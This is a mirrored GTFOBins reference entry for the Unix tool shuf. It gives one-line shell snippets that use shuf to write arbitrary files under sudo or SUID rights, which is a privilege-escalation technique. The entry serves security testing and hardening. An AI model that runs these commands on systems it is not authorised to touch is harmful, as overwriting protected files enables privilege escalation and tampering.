mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
18 lines
385 B
Markdown
18 lines
385 B
Markdown
|
---
|
||
|
description: The read file content is corrupted by adding a newline.
|
||
|
functions:
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
LFILE=file_to_write
|
||
|
sudo shuf -e data -o "$LFILE"
|
||
|
suid-enabled:
|
||
|
- description:
|
||
|
code: |
|
||
|
LFILE=file_to_write
|
||
|
./shuf -e data -o "$LFILE"
|
||
|
file-write:
|
||
|
- code: |
|
||
|
LFILE=file_to_write
|
||
|
shuf -e data -o "$LFILE"
|
||
|
---
|